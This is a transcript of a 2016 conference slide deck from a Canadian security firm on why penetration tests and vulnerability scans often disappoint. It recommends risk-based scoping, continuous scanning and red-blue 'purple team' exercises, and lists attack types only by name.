white hats and ethical hacking: what you’ve been doing wrong€¦ · white hats and ethical...
TRANSCRIPT
![Page 1: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/1.jpg)
White Hats and Ethical Hacking:What You’ve Been Doing Wrong
FocusOn CyberSecurity30 March 2016
![Page 2: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/2.jpg)
Overview
• Vulnerability assessments and penetration
testing
• What goes wrong
• The future of penetration testing
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 2
![Page 3: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/3.jpg)
Show of Hands …
• Have you ever requested a penetration test and
been disappointed with the results?
• Have you ever completed a penetration test for a
customer and felt that it “went nowhere”?
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 3
![Page 4: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/4.jpg)
Vulnerability Assessments and
Penetration Testing
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 4
![Page 5: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/5.jpg)
Vulnerability Assessments
• Tool-based
• Automated signature-based
scans for known
vulnerabilities
• Follows defined methodology
• Catches ~ 60% of vulnerabilities
• High false positive rates; value comes from
interpretation of results, root cause analysis
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 5
![Page 6: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/6.jpg)
Penetration Testing
• Intelligence-based testing; human intelligence
and experience drive results
• Identifies security weaknesses, vulnerabilities
• Goal is to exploit weaknesses
• Victory conditions:
– Compromise a system;
launch successful attacks
– Gain root access
– Even 1 compromise is a victory
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 6
![Page 7: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/7.jpg)
Vulnerability Assessments and Penetration Testing
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 7
![Page 8: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/8.jpg)
What Goes Wrong?
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 8
![Page 9: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/9.jpg)
Customer Quote
“I’m only doing this testing because it’s a
requirement for PCI.
I find it’s too expensive, you guys have a license to
print money!
Sure, you found lots of little vulnerabilities, but I
knew about those before you even got here. For
the money I’m paying you, I expect you to have
root access within an hour. Come on – impress
me!
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 9
![Page 10: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/10.jpg)
Customer Quote
“We’ve just started doing a security review so we
can qualify for new work from our client.
I’d like you to do a penetration test against my
network.
We’ll knock that off while the rest of the team
works on the other stuff like writing policies …”
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 10
![Page 11: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/11.jpg)
Customer Quote
“We want you to test our production network of
800 (+) servers. Some of the servers are flaky, so
make sure that you don’t crash them.
We need the testing to be completed by the end of
the week (reconciliation time is coming).
Because we do financial services, you can only
test at night, after midnight and end testing by 6:00
AM.
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 11
![Page 12: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/12.jpg)
Customer Quote
“You can only bid on this project if the testers have
actual experience in testing _______ plants of this
type, and have demonstrated that they can write
their own protocols to test the Zigbee radio
systems.
The following will be out of scope: physical
security, social engineering (including USB keys,
hostile phishing emails, and impersonating the
FedEx guy), insider attacks, attacks against the
NT4 servers we know are still there ….
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 12
![Page 13: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/13.jpg)
Consultant and Client
Consultant: “Here are the test results”
Client: “Thanks, I’ll make sure that IT against them
when we’re done the review”
Consultant: “I couldn’t help noticing that most of
the report is the stuff that we found last year …
and the year before that … and the year before
that one ….”
Client: “Yeah, well … we’ve been kinda busy”
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 13
![Page 14: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/14.jpg)
Summary of Findings
• Lack of executive support
• Misalignment of financial and liability versus risk
• Don’t understand impact of testing on network
• Unrealistic scope – tester
• Scope does not reflect reality – adversary type,
attack methodologies
• No accountability for responding to results
• No resolution tracking, change control
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 14
![Page 15: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/15.jpg)
Effective Vulnerability Scanning
• Credentialed scans
• Continuous scanning frequency
• Use at least 2 different scanning tools
• Feed results to trouble ticket system
• Accountability for remediation
• Verify remediation
• Scan devices (printers, power bars, etc)
• Build scanning into operational programs
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 15
![Page 16: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/16.jpg)
Effective Penetration Testing
• Define the goal - why are you testing?
• Align testing with risk, documented security policies
• Threat modelling
• In testing, follow the (critical) data
• Skilled testers + good reports = win
• Monitor
• Measure progress
• Don’t rely on a single tester
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 16
![Page 17: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/17.jpg)
The Future of Penetration Testing
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 17
![Page 18: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/18.jpg)
Change Your Testing Methodology 1
• Risk-based approach – what data are you trying
to protect?
• This data defines the tester’s goal
– It’s not about getting root, it’s about confirming
that you’ve protected the most important
corporate data
– Scoping will allow physical, logical tests
– Scope may include supply chain, 3rd parties
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 18
![Page 19: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/19.jpg)
Change Your Testing Methodology - 2
• What is the adversary doing? What “rules” dothey obey?
• What is their attackmethodology?
• If the attackers are usingsocial engineering, are you training to counteract that?
• Train as you fight
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 19
![Page 20: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/20.jpg)
Attack Methodologies You MUST Include
• Physical attacks against data systems (theft of
devices, key loggers, “road apples”)
• Wireless, VoIP networks
• Hostile MS Word, Excel documents with
PowerShell macros
• APT simulations
• Exfiltration simulations
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 20
![Page 21: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/21.jpg)
Change Your Testing Methodology - 3
• Blue Team - defenders
• Red Team – attackers, vulnerability scanners,
penetration testers
• Purple Team = Blue + Red
• Meaningfully exercise the
internal defences
• Doubles the value of a test
(at least)
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 21
![Page 22: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/22.jpg)
Questions?
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 22
![Page 23: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/23.jpg)
DigitalDefence (www.digitaldefence.ca)
• Specialize in penetration
testing, incident
response, data forensics
• Training provider
Robert W. Beggs, CISSP
• 15+ years experience in
all aspects of data
security
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 23
![Page 24: White Hats and Ethical Hacking: What You’ve Been Doing Wrong€¦ · White Hats and Ethical Hacking: What You’ve Been Doing Wrong FocusOn CyberSecurity 30 March 2016. Overview](https://reader036.vdocuments.us/reader036/viewer/2022070107/602218b8ac9af63d986c0508/html5/thumbnails/24.jpg)
Contact Me
© 2016 Digital Defence. All rights reserved. This document is for informational purposes
only. Digital Defence makes no warranties, express or implied, in this document.Slide 24
519-771-8808
https://ca.linkedin.com/in/robertbeggs